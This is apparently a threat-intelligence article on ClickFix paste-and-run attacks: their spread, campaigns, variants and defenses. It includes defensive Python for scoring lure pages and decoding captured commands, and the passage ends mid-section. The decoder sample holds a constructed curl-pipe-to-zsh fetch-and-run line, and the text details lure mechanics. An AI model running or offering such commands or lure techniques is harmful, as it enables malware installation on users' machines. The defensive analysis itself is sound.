ClickFix: The Copy-Paste Attack That Turns You Into Your Own Worst Enemy

How a social engineering technique surged 517% in 2025, became the number one initial access method observed by Microsoft Defender Experts, recruited nation-state hackers across three countries, spawned commercial builders and browser-crashing variants, and is now hijacking cryptocurrency swaps through Pastebin comments.

Somewhere right now, a person is staring at a fake error message on their screen. The prompt looks familiar—maybe a CAPTCHA, maybe a browser update notification, maybe a troubleshooting dialog from what appears to be Microsoft or Google. It tells them there is a problem, and it offers a fix. All they have to do is copy a command, paste it into their system terminal, and press Enter.

When they do, the malware installs itself. No drive-by download. No malicious attachment. No exploit kit. The victim did it with their own hands.

This is ClickFix, and it has become one of the defining cybersecurity threats of the past two years. What started as a niche trick deployed by a single initial access broker in early 2024 has erupted into a global phenomenon, adopted by criminal gangs and intelligence services alike, targeting individuals, enterprises, and government agencies across every major operating system. By the end of 2024, the technique had begun its surge; Microsoft's October 2025 Digital Defense Report identified it as the number one initial access method in its Defender Experts data, accounting for 47% of all incidents. By the first half of 2025, ESET had measured a 517% surge in six months. And in early 2026, the technique continues to evolve in ways that make it harder to detect and easier to deploy than at any point in its history.

In its latest iteration, ClickFix is being weaponized through Pastebin comments to hijack cryptocurrency transactions in real time—while a separate variant deliberately crashes victims' browsers to manufacture the very problem it claims to fix.

The Anatomy of a Self-Inflicted Compromise

ClickFix works by exploiting something no firewall or antivirus can fully protect against: human behavior.

The technique was first documented in March 2024 by researchers at Proofpoint, who identified it in campaigns run by the initial access broker tracked as TA571 and the ClearFake malware distribution cluster. Proofpoint's researchers coined the name “ClickFix” because the malicious prompts almost always included a button labeled “Fix,” “How to fix,” or “Fix it.”

A note on naming: ClickFix, ClearFake, paste-and-run, and FakeCAPTCHA

If you have read other sources on this topic, you have likely encountered the same underlying technique under several different names: ClickFix, paste-and-run, ClearFake, FakeCAPTCHA, and occasionally fakeCAPTCHA (lowercase). This is not a case of competing descriptions of different attacks—they largely describe the same category of behavior. Here is how to untangle them.

ClickFix is the name Proofpoint coined to describe the social engineering technique itself, specifically where a fake error or verification prompt tricks a user into manually executing a pasted command. It is the dominant term in industry reporting and the one used throughout this article.

ClearFake is the name for a specific activity cluster—a group of threat actors who compromise legitimate websites and inject malicious scripts to deliver payloads. ClearFake uses ClickFix as its delivery mechanism; it is not a synonym for the technique. GoDaddy researchers note ClearFake was observed as early as August 2023, and some sources apply that earlier date to the broader technique. This article uses March 2024 as the documented starting point for the ClickFix technique specifically because that is when Proofpoint first identified and named the clipboard-paste-execute social engineering pattern as distinct from older fake-browser-update campaigns.

Paste-and-run is the preferred term used by Red Canary’s threat intelligence team, who argue it is more accurate because not all lures involve a “fix”—some involve fake CAPTCHA checks, meeting errors, or document rendering problems where the word “fix” never appears. They have a point, and MITRE ATT&CK’s formal designation is Malicious Copy and Paste (T1204.004).

This article uses “ClickFix” because it is the most widely recognized term in current threat reporting, appears in the highest volume of primary sources, and is the name most readers will encounter in vendor advisories and news coverage. All of these names describe the same threat.

Some researchers note the technique may have appeared in limited form as early as October 2023, but its widespread proliferation began in early 2024 following TA571's deployment.

That naming choice was more than descriptive—it pointed to the psychological core of the attack. The technique exploits a deeply conditioned behavior: when users encounter what appears to be a system error with a ready-made solution, many follow the instructions without questioning the source. Years of interacting with automated repair prompts, troubleshooters, and one-click fixes across operating systems have trained users to trust these interactions. Attackers recognized this pattern and weaponized it.

The basic attack unfolds in three steps. First, the victim lands on a webpage—via a compromised legitimate site, a phishing link, malvertising, or SEO poisoning—displaying what appears to be a CAPTCHA verification, a browser error, or a document rendering problem. Second, the page silently copies a malicious command—typically a PowerShell script or shell command—to the victim's clipboard using JavaScript's navigator.clipboard.writeText() API. Third, the victim is instructed to open a system dialog (the Windows Run box via Win+R, Terminal on macOS, or in some variants the browser console) and paste the command.

ClickFix core infection chain
01 / LURE: Victim lands on page. Compromised site, phishing link, malvertising, or SEO poisoning delivers a fake CAPTCHA, browser error, or document prompt.
02 / CLIPBOARD: Silent payload copy. JavaScript calls navigator.clipboard.writeText() — a malicious PowerShell or shell command is placed on the clipboard without any visible indication.
03 / EXECUTE: User opens Run / Terminal. Victim is told to press Win+R (or open Terminal on macOS), paste, and press Enter. Security tools see a legitimate user action.
04 / PAYLOAD: Malware installs. Script fetches and executes a second-stage payload — infostealer, RAT, ransomware dropper, or RMM tool — often running entirely in memory.

Attackers have cloned real interfaces to increase believability: Cloudflare Turnstile, Google reCAPTCHA, Microsoft authentication pages, and Okta login portals have all been replicated in documented ClickFix campaigns. Recorded Future's Insikt Group, in a March 2026 analysis of five distinct ClickFix clusters observed since at least May 2024, found that more sophisticated clusters now perform operating system detection at the landing page level, serving tailored commands for Windows or macOS depending on the victim's environment.

In MITRE ATT&CK terms, the attack maps primarily to T1204.004 (User Execution: Malicious Copy/Paste)—a sub-technique added specifically to capture this pattern—combined with T1059.001 (Command and Scripting Interpreter: PowerShell) and T1189 (Drive-by Compromise) for initial delivery.

The result is that the victim bypasses their own security protections. Endpoint detection tools, browser sandboxes, and email filters are designed to stop automated malware delivery. ClickFix sidesteps all of them by having the user execute the malicious payload manually. Email security scans attachments and URLs, but ClickFix campaigns frequently contain only a clean URL that redirects through a traffic distribution system (TDS) before landing on the attack page. Browser protections like Google Safe Browsing do not trigger because the browser is not downloading an executable—the user is. The browser sees a legitimate clipboard copy event. The EDR sees the user opening PowerShell. Neither triggers an alert in isolation because the actions are indistinguishable from normal user behavior.
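As an added example (not code from Proofpoint, Microsoft, or any other source cited here), the following Python scores fetched page HTML for the two halves of the lure described above: a script-side clipboard write paired with visible instructions to open Run or a terminal and paste. The sample pages are constructed, and the weights and threshold are my own choices.

```python
"""Score fetched HTML for the two halves of a ClickFix lure page.

Added example written for this article. A lure needs both a silent
clipboard write and visible instructions to open Run / a terminal and
paste; requiring both keeps ordinary "copy this snippet" pages from
matching. The sample pages below are constructed.
"""
import re
from dataclasses import dataclass, field

# Script-side markers: the ways a page can place text on the clipboard.
CLIPBOARD_WRITE = [
    r"navigator\.clipboard\.writeText\s*\(",
    r"document\.execCommand\s*\(\s*['\"]copy['\"]\s*\)",
]
# Instruction-side markers, matched against the text the visitor actually sees.
RUN_PROMPT = [
    r"\bwin(dows)?\s*(key)?\s*\+\s*r\b",   # "Win+R", "Windows key + R"
    r"\brun\s+dialog\b",
    r"\bterminal\b",
    r"\bpowershell\b",
]
PASTE_PROMPT = [r"\bctrl\s*\+\s*v\b", r"\bcmd\s*\+\s*v\b", r"\bpaste\b"]
LURE_WORDS = [r"\bcaptcha\b", r"\bverify you are human\b", r"\bfix\s*it\b",
              r"\bhow to fix\b", r"\bstopped abnormally\b"]


@dataclass
class LureVerdict:
    score: int = 0
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Both halves must be present: something wrote the clipboard AND the
        # visitor is told where to paste it.
        has_copy = any(h.startswith("clipboard:") for h in self.hits)
        has_run = any(h.startswith("run:") for h in self.hits)
        return has_copy and has_run and self.score >= 3


def visible_text(html: str) -> str:
    """Drop scripts and tags so instruction words are matched where the user reads them."""
    text = re.sub(r"<script\b.*?</script>", " ", html, flags=re.S | re.I)
    text = re.sub(r"<[^>]+>", " ", text)
    return re.sub(r"\s+", " ", text).lower()


def scan_page(html: str) -> LureVerdict:
    verdict = LureVerdict()
    # Clipboard writes may sit in <script> or in an onclick attribute, so scan raw HTML.
    for pat in CLIPBOARD_WRITE:
        if re.search(pat, html):
            verdict.hits.append(f"clipboard:{pat}")
            verdict.score += 2
    shown = visible_text(html)
    for label, pats in (("run", RUN_PROMPT), ("paste", PASTE_PROMPT), ("lure", LURE_WORDS)):
        for pat in pats:
            if re.search(pat, shown):
                verdict.hits.append(f"{label}:{pat}")
                verdict.score += 1
    return verdict


# Constructed sample: a fake "verify you are human" page with both halves.
SAMPLE_LURE = """
<html><body>
<h2>Verify you are human</h2>
<p>To complete the CAPTCHA: 1. Press Win + R 2. Press Ctrl + V 3. Press Enter</p>
<button onclick="verify()">Fix it</button>
<script>
var cmd = "<constructed placeholder, not a real command>";
function verify() { navigator.clipboard.writeText(cmd); }
</script>
</body></html>
"""

# Constructed control: a documentation page with an ordinary copy button.
SAMPLE_BENIGN = """
<html><body>
<p>Install with pip. Copy the command below.</p>
<button onclick="navigator.clipboard.writeText('pip install example')">Copy</button>
</body></html>
"""

if __name__ == "__main__":
    for name, page in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        v = scan_page(page)
        print(name, v.score, v.suspicious, v.hits)
```

Documentation pages that pair a copy button with "open a terminal and paste" steps are the main false positives, so tune the word lists against a baseline of your own traffic before alerting on this.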

An Explosion in Scale

The numbers describe a threat that has moved from emerging to dominant in under two years.

ESET's H1 2025 Threat Report, published June 26, 2025, found that ClickFix detections surged 517% compared to H2 2024. The technique accounted for nearly 8% of all blocked attacks during the period, making it the second most common attack vector behind only traditional phishing. Jiří Kropáč, Director of Threat Prevention Labs at ESET, said in a statement accompanying the report: “The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors.”

Microsoft's 2025 Digital Defense Report, published in October 2025, placed ClickFix at the top of the initial access hierarchy. The report identified it as the number one initial access method observed by Microsoft Defender Experts, accounting for 47% of all incidents tracked—surpassing traditional phishing, which accounted for 35%. The report specifically noted that the rapid surge began in November 2024 and has not slowed. Nearly half of all initial compromises that Microsoft tracked in its Defender Experts data in the preceding year came down to users pasting commands into their own systems.

Why one report says "second" and another says "first"

You may notice that ESET's H1 2025 data ranks ClickFix as the second most common attack vector (behind phishing), while Microsoft's 2025 Digital Defense Report ranks it first at 47% of incidents. Both figures are accurate within their own scope, and the difference is methodological rather than contradictory. ESET's data measures ClickFix as a share of all blocked threats across its entire telemetry base—a broader population that includes a large volume of commodity phishing that traditional filters still catch at high rates. Microsoft's 47% figure comes specifically from Microsoft Defender Experts incident data—a subset of higher-severity, actively investigated initial access events rather than all blocked threats. In the population of incidents that actually result in human-investigated compromise, where commodity phishing has largely been filtered out, ClickFix has become the dominant vector. Both numbers are credible. The ESET figure better represents the broad threat landscape; the Microsoft figure better represents the risk of actual successful compromise reaching a human analyst. This article cites both because they illuminate different things. The short version: by the time phishing filters have done their work, ClickFix is what is left.

ClickFix by the numbers — 2025
517% surge in ClickFix detections, H1 2024 vs H1 2025 (ESET H1 2025 Threat Report)
47% of all initial access incidents tracked by Microsoft Defender Experts (Microsoft MDDR 2025)
~8% of all blocked attacks globally — second only to phishing (ESET H1 2025 Threat Report)
$800 one-time cost of ErrTraffic — commercial ClickFix builder with ~60% conversion rate (Hudson Rock, Dec 2025)
Initial access method breakdown — Microsoft Defender Experts 2025: ClickFix 47%, Phishing 35%, Other 18%.

The Center for Internet Security (CIS) published corroborating data in an October 2025 advisory. The CIS Cyber Threat Intelligence team, tracking ClickFix campaigns between January and October 2025 across U.S. state, local, tribal, and territorial (SLTT) government networks, found that ClickFix comprised over a third of all non-malware alerts generated by Albert—CIS's intrusion detection system deployed across those networks—in the first half of 2025. The CIS team documented campaigns that led directly to ransomware deployment, including an August 2025 Interlock ransomware incident impacting an SLTT government victim. Separately, ReliaQuest reported in June 2025 that ClickFix drove a 10% increase in detected drive-by compromises during the March through May 2025 period.

What makes this growth especially alarming is the industrialization of the technique. ESET's report found that threat actors are selling ClickFix builders on criminal markets, giving low-skilled attackers weaponized landing pages ready for deployment. This commoditization has since deepened: a cybercrime tool called ErrTraffic, identified by Hudson Rock researchers on Russian-language forums in December 2025, allows threat actors to automate ClickFix attacks by generating fake visual glitches on compromised websites. Sold for a one-time purchase of $800, ErrTraffic includes OS fingerprinting, geolocation targeting, and multi-platform payload delivery across Windows, macOS, Android, and Linux. Dashboard data from active campaigns showed conversion rates approaching 60%.

Recorded Future's Insikt Group, in its March 2026 cluster analysis, noted a consistent architectural pattern across all five tracked clusters: each relies on a living-off-the-land approach, routing execution through native system utilities already present on the operating system. Once execution completes, the final payload typically runs entirely in memory, leaving almost no forensic evidence on disk. On Windows, persistence is established by placing a shortcut in the Startup folder. The technique is optimized not just for delivery but for evasion after delivery.

From Cybercrime to Espionage

Perhaps the clearest signal that ClickFix has moved from a fringe technique to an established weapon is its adoption by nation-state actors.

In an April 2025 report titled “Around the World in 90 Days,” Proofpoint documented how at least four state-sponsored groups incorporated ClickFix into their espionage campaigns between October 2024 and January 2025. The groups spanned three countries: North Korea's Kimsuky (tracked as TA427), Iran's MuddyWater (tracked as TA450), and two Russian groups—APT28 (TA422) and a cluster tracked as UNK_RemoteRogue.

Nation-state ClickFix adoption — documented timeline
Oct–Dec 2024: UNK_RemoteRogue & APT28 (TA422), Russia. UNK_RemoteRogue targets two defense-sector organizations via compromised Zimbra servers. APT28 separately uses ClickFix against Ukrainian government entities. Both replace standard installation stages with clipboard-paste execution.
Nov 2024: MuddyWater (TA450), Iran. Phishing campaign hits 39+ Middle East organizations via spoofed Microsoft security update emails. Payload: Level RMM software for persistent access — designed to blend in as authorized tooling.
Jan–Feb 2025: Kimsuky (TA427), North Korea. Targets think tank researchers on North Korean affairs by posing as Japanese diplomatic personnel. Multi-stage chain delivers Quasar RAT. Proofpoint notes this as the first observed Kimsuky ClickFix use.
Feb–Mar 2025: Lazarus Group (ClickFake Interview), North Korea. Impersonates Coinbase, Kraken, and Bybit in fake job interview campaigns targeting crypto finance employees. Sekoia documents the "ClickFake Interview" cluster.
Feb 2026: UNC1069, North Korea. Spoofed Zoom meeting targets a cryptocurrency executive via Telegram. Fake audio troubleshooting triggers infection chain deploying seven distinct macOS malware families. Documented by Google Mandiant.

Each group adapted ClickFix to its existing tradecraft. Proofpoint first observed Kimsuky using ClickFix in January and February 2025, targeting individuals in fewer than five organizations in the think tank sector. In one documented case, TA427 operators masqueraded as a Japanese diplomat and sent emails to a target asking to arrange a meeting with Ambassador Shigeo Yamada, the Japanese ambassador to the United States. After building trust through legitimate-seeming communications—including a benign attachment with a PDF titled “Letter from Ambassador Cho Hyun-Dong.pdf”—the attackers directed the target to an attacker-controlled site impersonating a secure document-sharing platform. The ClickFix lure on that page initiated a multi-stage chain executing PowerShell, VBS, and batch scripts that ultimately delivered Quasar RAT, a commodity remote access trojan.

MuddyWater took a different approach, sending phishing emails from the attacker-controlled address support@microsoftonlines.com to targets in at least 39 organizations across the Middle East. The emails masqueraded as urgent Microsoft security updates, instructing recipients to execute commands that would supposedly patch a critical vulnerability. Rather than delivering traditional malware, MuddyWater used ClickFix to install legitimate remote monitoring and management (RMM) software—specifically, Level—for persistent access, an approach designed to blend in with authorized software.

Proofpoint noted in its analysis that the incorporation of ClickFix was not revolutionizing these groups' campaigns but rather replacing the installation and execution stages in existing infection chains with a method that leveraged human interaction to bypass security measures. Some groups experimented with the technique in limited campaigns before returning to standard tactics—suggesting ongoing evaluation of its operational value rather than full commitment.

Experimentation vs. adoption: why the distinction matters

Some coverage of ClickFix's nation-state involvement has described the development as nation-states “adopting” or “weaponizing” the technique, framing it as a permanent shift in state tradecraft. Proofpoint's own language is more precise: these groups are experimenting with ClickFix, and Proofpoint itself noted that some returned to their standard tactics shortly after initial trials. This is a meaningful distinction. Nation-state groups continually evaluate new techniques in limited test campaigns; using ClickFix once does not mean it has become a core tool. At the same time, the fact that groups from three separate countries tested it within the same three-month window, and that North Korean actors have continued deploying it in cryptocurrency-targeting campaigns well into 2026, suggests the experiment has shown enough promise to persist. This article characterizes the activity as adoption by some groups and experimentation by others, because that is what the sourced reporting actually shows. Readers should treat sweeping claims that nation-states have “fully adopted” ClickFix with scrutiny; the evidence supports ongoing and expanding use, not necessarily wholesale integration across all operations.

Since Proofpoint's April 2025 report, nation-state adoption has expanded further. In February and March 2025, Sekoia documented Lazarus Group—a North Korean threat actor tracked separately from Kimsuky—launching “ClickFake Interview” campaigns that used ClickFix tactics to target non-technical employees at centralized finance companies, impersonating major cryptocurrency firms including Coinbase, Kraken, and Bybit. In February 2026, Google Mandiant researchers documented UNC1069, a North Korean threat group, using a spoofed Zoom meeting in a ClickFix campaign that deployed seven distinct macOS malware families against a cryptocurrency executive. The victim was initially contacted via Telegram from a compromised account belonging to a crypto company executive, then directed to a spoofed Zoom page where fake audio troubleshooting steps initiated the infection chain.

Microsoft's security team published a comprehensive August 2025 analysis documenting a campaign cluster targeting organizations in government, finance, transportation, and education across Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico. The campaign—which Microsoft first identified in May 2025 targeting Portuguese organizations, then tracked expanding internationally—delivered Lampion malware, an infostealer focused on banking credentials, and remained active as of the publication date. The delivery mechanism used phishing emails containing a ZIP file; once opened, an HTML file redirected targets to a fake Portuguese tax authority site where the ClickFix lure was hosted.

Microsoft also documented a March 2025 campaign by a cluster tracked as Storm-0426 that used phishing emails with payment and invoice lures, routing victims through the Prometheus traffic distribution system across numerous compromised sites before landing on ClickFix pages that deployed MintsLoader. A June 2025 campaign impersonating the U.S. Social Security Administration, beginning with emails sent from a legitimate but compromised Brazilian domain, used ClickFix to deliver ScreenConnect—a legitimate remote management tool that once installed provides an attacker full remote control of the victim's system.

The Pastebin Crypto Swap Attack

While ClickFix has been deployed through dozens of lures—fake CAPTCHAs, browser errors, meeting invitations, Windows update screens—one of its more recent and technically distinct variants targets cryptocurrency users through Pastebin comments.

As reported by BleepingComputer in February 2026, threat actors are distributing ClickFix-style attacks through Pastebin, tricking cryptocurrency users into executing malicious JavaScript in their browser that hijacks Bitcoin swap transactions and redirects funds to attacker-controlled wallets. The campaign uses social engineering that promises large profits from a supposed arbitrage exploit on the Swapzone.io cryptocurrency exchange aggregator.

A detailed technical analysis published by BeyondMachines examined the mechanics. Posts advertised as a “Crypto Exchange profit method” link to a Google Drive document presented as an “exploit guide.” The document provides a fabricated technical explanation of a supposed backend vulnerability in the systems of real exchange ChangeNOW, promising approximately 37% profit during cryptocurrency conversion. The instructions describe a “simple program” that users need to run.

The instructions direct victims to navigate to Swapzone.io, then manually type javascript: in their browser's address bar—browsers block pasting this prefix as a security measure, so the victim must type it manually—and then paste a script provided by the attackers. What actually executes is far from the promised arbitrage tool. The script contains a URL with a base64-encoded payload hidden in the path structure. It extracts this encoded string, decodes it, fetches the actual malicious code from a remote server, and executes it.

The decoded payload contains multiple attack vectors working simultaneously. Functions modify the displayed exchange rates and amounts on the Swapzone interface to show the fake 37% profit increase. Meanwhile, clipboard hijacking silently replaces any copied wallet addresses with attacker-controlled addresses. The victim sees inflated exchange rates, believes the exploit is working, and initiates a swap—sending their cryptocurrency directly to the attacker.

The social engineering is particularly effective because it exploits greed rather than fear. Unlike typical ClickFix lures that create urgency around a fake technical problem, this variant appeals to the victim's desire to profit from someone else's vulnerability. The BeyondMachines analysis pointed out that the premise collapses under scrutiny: a 37% rate discrepancy would be detected within minutes by professional arbitrage traders, the technical explanation involving “Node v1.9” is architecturally nonsensical, and anyone who actually discovered such a flaw would exploit it privately rather than sharing it with strangers on Pastebin.

This crypto-targeting variant is operating within a broader context of industrial-scale cryptocurrency fraud. According to Chainalysis's 2026 Crypto Crime Report, an estimated $14 billion in cryptocurrency was received by scam-linked addresses on-chain in 2025, with projections the total could exceed $17 billion as additional illicit wallets are identified—consistent with historical reporting patterns where estimates increase by an average of 24% between reporting periods. Impersonation scams posted 1,400% year-over-year growth, and AI-enabled scams were found to be 4.5 times more profitable than traditional scams. The average scam payment increased from $782 in 2024 to $2,764 in 2025.

The Expanding Attack Surface

ClickFix has not remained confined to Windows. ESET's H1 2025 report explicitly noted that the technique affects all major operating systems, including Windows, Linux, and macOS. While Windows remains the primary target, the cross-platform expansion represents a significant escalation in the threat's reach.

Campaigns targeting macOS users gained particular momentum in 2025. Sekoia documented macOS-targeting ClickFix campaigns as early as late 2024 through fake Google Meet pages distributing infostealers. By mid-2025, the campaigns had grown more technically refined. CloudSEK identified a campaign impersonating Spectrum, a U.S. telecommunications provider, that used ClickFix to deliver the Atomic macOS Stealer (AMOS) infostealer through typosquatted domains. Microsoft's August 2025 analysis noted that some delivery pages contained implementation errors—including displaying Windows-specific instructions to macOS users—suggesting hastily assembled infrastructure deployed at volume.

Recorded Future's Insikt Group identified a fifth activity cluster, observed in early 2026, that specifically served macOS victims with tailored execution chains. One page impersonating Apple's support site instructed users to run a command ostensibly to free up storage space. That command used stacked encoding—first decoding hex to Base64, then piping the result through the zsh shell—to silently fetch and execute MacSync, an information stealer. On macOS, ClickFix payloads running entirely in memory have been observed to establish persistence via Launch Agents or Login Items rather than the Windows Startup folder, but the underlying social engineering is identical across platforms.
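The following Python decoder is an added example, not code from Recorded Future or any other source on this page. It peels the hex-to-Base64-to-shell stacking described above off a captured command so an analyst can read the inner command and its URLs without executing anything, and as a generalization it also unwraps the UTF-16LE Base64 that PowerShell's -EncodedCommand uses. Both sample commands are constructed with a placeholder host.

```python
"""Peel stacked encodings off a captured ClickFix command without running it.

Added example written for this article. The macOS lure hides its pipeline
as hex that decodes to Base64 that decodes to a shell command; Windows
lures do the same with PowerShell -EncodedCommand (UTF-16LE Base64). The
samples are constructed here with a placeholder host so the script is
self-contained.
"""
import base64
import binascii
import re

HEX_RUN = re.compile(r"\b[0-9a-fA-F]{32,}\b")
B64_RUN = re.compile(r"\b[A-Za-z0-9+/]{24,}={0,2}")
URL = re.compile(r"https?://[^\s'\"|;]+")


def _as_text(raw: bytes):
    """Return raw as a string if it looks like text (UTF-8, or UTF-16LE as -enc uses)."""
    if raw.count(b"\x00") > len(raw) // 3:
        text = raw.decode("utf-16-le", "replace")
    else:
        text = raw.decode("utf-8", "replace")
    if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def _decode_once(layer: str):
    """First token in this layer that decodes to text; hex is tried before Base64."""
    for m in HEX_RUN.finditer(layer):
        try:
            text = _as_text(binascii.unhexlify(m.group(0)))
        except (binascii.Error, ValueError):
            text = None
        if text:
            return text
    for m in B64_RUN.finditer(layer):
        try:
            text = _as_text(base64.b64decode(m.group(0), validate=True))
        except (binascii.Error, ValueError):
            text = None
        if text:
            return text
    return None


def peel(command: str, max_layers: int = 6) -> list:
    """Decoded layers, outermost first; the last entry is what the shell would run."""
    layers = [command]
    while len(layers) <= max_layers:
        inner = _decode_once(layers[-1])
        if inner is None or inner == layers[-1]:
            break
        layers.append(inner)
    return layers


def indicators(command: str) -> dict:
    """Triage summary an analyst can paste into a ticket."""
    layers = peel(command)
    inner = layers[-1]
    return {
        "layers_removed": len(layers) - 1,
        "urls": sorted({u for layer in layers for u in URL.findall(layer)}),
        "pipes_to_shell": bool(re.search(r"\|\s*(zsh|bash|sh)\b", inner)),
        "inner_command": inner,
    }


# Constructed samples (placeholder host). The macOS one reproduces the
# hex -> Base64 -> zsh shape; the Windows one the -enc UTF-16LE shape.
MAC_INNER = "curl -fsSL https://stage2.example.invalid/update.sh | zsh"
_b64 = base64.b64encode(MAC_INNER.encode()).decode()
SAMPLE_MAC = f"echo {_b64.encode().hex()} | xxd -r -p | base64 -d | zsh"

WIN_INNER = "Write-Host 'constructed sample'"
SAMPLE_WIN = "powershell -w hidden -enc " + base64.b64encode(WIN_INNER.encode("utf-16-le")).decode()

if __name__ == "__main__":
    for sample in (SAMPLE_MAC, SAMPLE_WIN):
        print(indicators(sample))
```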

In February 2026, BleepingComputer reported that threat actors were abusing Claude AI artifacts and Google Ads in ClickFix campaigns delivering infostealer malware to macOS users. Moonlock Lab and AdGuard researchers found that over 10,000 users had accessed the malicious content, which was hosted on the claude.ai domain. The campaign demonstrated that attackers are willing to leverage any trusted platform—including AI tools—to lend credibility to malicious instructions.

Linux targeting, while less extensively documented in public reporting, represents an underappreciated risk. Enterprise servers, developer workstations, and cloud environments running Linux can be targeted through ClickFix lures that instruct users to paste commands into terminal emulators. ErrTraffic explicitly includes Linux payload delivery, and the same social engineering principles that work against Windows and macOS users apply equally to Linux administrators accustomed to executing commands in the shell.

Variants: FileFix, CrashFix, and Beyond

The core ClickFix technique has spawned a family of variants, each exploiting a different execution path while maintaining the same social engineering premise.

ClickFix variant comparison
Each entry lists the execution path, the lure type, notable payloads, and when the variant was first documented.
ClickFix. Execution path: Windows Run dialog (Win+R) or Terminal. Lure type: fake CAPTCHA, browser error, document fix. Notable payload: Lumma Stealer, AsyncRAT, NetSupport RAT, Quasar RAT. First documented: Mar 2024.
FileFix. Execution path: Windows File Explorer address bar. Lure type: fake file path — PowerShell command first, benign-looking path hidden after # as decoy. Notable payload: various infostealers; in-wild within 2 weeks of disclosure. First documented: Jun 2025.
CrashFix. Execution path: Windows Run dialog (Win+R) after real browser crash. Lure type: NexShield extension deliberately OOM-crashes browser; fake recovery prompt. Notable payload: ModeloRAT (Python RAT, domain-joined hosts only). First documented: Jan 2026.
ConsentFix. Execution path: Azure CLI OAuth consent flow. Lure type: fake Microsoft account verification. Notable payload: Microsoft account takeover — no password or MFA bypass needed. First documented: 2025.
TerminalFix. Execution path: native shell (macOS Terminal / Linux bash). Lure type: system error requiring "manual terminal fix". Notable payload: macOS infostealers, cross-platform payloads. First documented: 2025.
DownloadFix. Execution path: file download and manual execution. Lure type: fake installer or patch lure. Notable payload: various; depends on campaign. First documented: 2025.

In June 2025, security researcher mr.d0x introduced FileFix, a variant that shifts the attack vector from the Windows Run dialog to the Windows File Explorer address bar. A malicious webpage opens a legitimate Explorer window via the HTML <input type="file"> element while silently copying a disguised PowerShell command to the victim's clipboard. The victim is instructed to paste what appears to be a file path into the Explorer address bar. The clipboard content actually contains the malicious command first, followed by a comment character (#) and a convincing-looking file path as a decoy — so only the innocent-looking path is visible in the address bar, but the PowerShell command before it executes. Check Point Research observed threat actors actively testing FileFix in real-world campaigns within two weeks of its public disclosure, identifying a phishing domain registered July 6, 2025 that deployed FileFix scripts.

In January 2026, a more sophisticated variant emerged. Huntress researchers identified a campaign by the threat actor tracked as KongTuke—also known as 404 TDS, Chaya_002, LandUpdate808, and TAG-124—using a malicious Chrome extension called NexShield to deliver what Huntress named CrashFix. NexShield masqueraded as the legitimate uBlock Origin Lite ad blocker, impersonating the developer Raymond Hill, and was distributed via Google Ads targeting users searching for ad blockers. It had accumulated at least 5,000 downloads before being removed from the Chrome Web Store.

Unlike typical ClickFix variants that fake a problem, CrashFix creates a real one. NexShield includes a 60-minute delayed payload execution to avoid linking the extension to subsequent behavior. When it activates, the extension floods the browser with chrome.runtime port connections in an infinite loop, exhausting memory resources and causing Chrome or Edge to hang and crash. When the victim force-closes and restarts the browser, the extension displays a fake security warning claiming the browser “stopped abnormally” and recommends running a scan. That recommendation leads to the familiar ClickFix sequence: open the Windows Run dialog (Win+R), paste the clipboard contents, press Enter.

“By impersonating a trusted open-source project, crashing the user’s browser on purpose, and then offering a fake fix, they have built a self-sustaining infection loop that preys on user frustration.”
— Huntress researchers Anna Pham, Tanner Filip, and Dani Lopez, January 2026

Microsoft confirmed CrashFix as a notable escalation in ClickFix tradecraft in a February 5, 2026 analysis, describing it as combining “user disruption with social engineering to increase execution success while reducing reliance on traditional exploit techniques.” Microsoft also documented a specific LOLBin abuse within the CrashFix chain: the native Windows utility finger.exe—originally designed to retrieve user information from remote systems—is copied to the temporary directory, renamed to ct.exe, and used to retrieve an obfuscated PowerShell payload from an attacker-controlled IP address. This renaming is intended to obscure the utility's identity during analysis.

For domain-joined hosts in corporate environments, the CrashFix chain culminates in ModeloRAT, a previously undocumented Python-based RAT that uses RC4 encryption for command-and-control communications, establishes persistence via the Registry, and supports execution of binaries, DLLs, Python scripts, and PowerShell commands. KongTuke deliberately targets corporate environments: domain-joined machines receive the full ModeloRAT payload, while home user machines received a “TEST PAYLOAD!!!!” response from the C2 during Huntress's analysis, suggesting the non-enterprise attack chain remained under development. KongTuke's infrastructure has previously been linked to Rhysida ransomware and Interlock ransomware operations.

Other documented variants include ConsentFix, reported by BleepingComputer, which abuses the Azure CLI OAuth application to hijack Microsoft accounts. The attacker needs neither the victim's password nor an MFA bypass, because the victim's own authenticated, MFA-satisfied session is what authorizes the attacker's access; this is an escalation beyond credential theft toward direct account takeover through OAuth phishing, and because nothing runs in PowerShell it is invisible to the endpoint controls described below. A variant called TerminalFix convinces users to manually open native shell applications, while DownloadFix tricks users into downloading and executing malicious files through social pretexts. Each variant exploits the same core weakness: user trust in routine system interactions.

Defense Strategies

Defending against ClickFix requires a layered approach that addresses both the technical and human dimensions of the attack.

On the technical side, the CIS advisory provides a strong starting point: restrict PowerShell script execution for standard users by setting the execution policy through Group Policy to AllSigned (only signed scripts run) or Restricted (no script files run at all). Use AppLocker or Software Restriction Policies to prevent powershell.exe and pwsh.exe from launching for non-administrative users entirely; of the controls in this list, this is the one that actually stops a pasted one-liner, because it acts on the executable rather than on script files. Configure UAC to prompt for administrator credentials on the secure desktop so that a pasted command cannot elevate silently; note that this governs elevation only and does nothing to stop PowerShell from running unelevated, which is why it is paired with AppLocker. For organizations using Windows Defender Application Control (WDAC), deploy code integrity policies; an enforced WDAC policy also places PowerShell in Constrained Language Mode, which breaks most stagers that depend on .NET and COM objects. Blocking PowerShell when it is launched from a suspicious parent process is a rule for the EDR or attack surface reduction layer rather than for the code integrity policy itself, and belongs in the same stack.

Important: PowerShell ExecutionPolicy is not a security boundary

